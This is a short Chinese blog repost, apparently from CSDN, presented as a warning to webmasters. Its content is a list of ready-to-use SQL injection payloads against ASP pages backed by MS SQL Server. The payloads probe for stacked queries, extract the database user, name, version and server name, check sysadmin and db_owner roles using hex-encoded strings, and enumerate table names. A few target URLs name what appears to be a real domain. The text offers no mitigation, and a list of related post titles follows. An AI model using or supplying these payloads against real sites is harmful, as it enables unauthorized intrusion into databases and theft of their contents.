站长注意SQL 注入一些常用语句
来源:互联网 发布:淘宝网司法公开拍卖 编辑:程序博客网 时间:2024/05/17 21:46
站长注意SQL 注入一些常用语句
作者:aivii 来源:csdn
是否支持多句查询
http://www.xxx.com/shownews.asp?id=51 declare @a int--
是否支持子查询
http://www.xxx.com/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0
返回用户名
http://www.xxx.com/shownews.asp?id=51 And user%2Bchar(124)=0
当前用户是否为 sysadmin 固定服务器角色的成员。
http://www.xxx.com/shownews.asp?id=51 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1
PS:0x730079007300610064006D0069006E00 = sysadmin
当前用户是否为 db_owner 固定数据库角色的成员
http://www.xxx.com/shownews.asp?id=51 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2Bchar(124)=1
0x640062005F006F0077006E0065007200 = db_owner
返回数据库名
http://www.xxx.com/shownews.asp?id=51 And db_name()%2Bchar(124)=0
操作系统和SQLserver版本
http://www.99568.com/shownews.asp?id=51 And @@version = 1
本地服务器名称
http://www.99568.com/shownews.asp?id=51 And @@SERVERNAME = 1
http://www.xxx.com.cn/Content.asp?NewsID=1077 And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 --第一个表名
- 站长注意SQL 注入一些常用语句
- SQL注入常用语句
- sql注入常用语句
- 注入常用SQL语句
- SQL注入常用语句
- 常用SQL注入语句
- 常用SQL注入语句
- 常用SQL注入语句
- 常用SQL注入语句
- 常用SQL注入语句
- 常用SQL注入语句
- 常用sql注入语句
- 常用SQL注入语句
- 常用sql注入语句
- SQL 注入有常用语句
- SQL 注入有常用语句
- SQL 注入有常用语句
- sql注入的常用语句
- AJAX在GET中文的时候解决乱码的方法
- MOTO LINUX系MOBILEPHONE的EZX库解读
- dll编程 02
- dll编程 03
- (经典)瑾此献给1975-1989年出生的人(看后请顶)
- 站长注意SQL 注入一些常用语句
- ajax代理程序,自动判断字符编码
- 详解链接的rel与target
- 网络经典命令
- 喝杯白酒,交个朋友
- 团队管理[转载]
- [解决方法]网络策略设置禁止您使用该网站获取您计算机的更新程序。 如果您确认此消息有误,请向您的系统管理员咨询。
- 由浅到深了解JavaScript类(转贴)
- asterisk的配置文档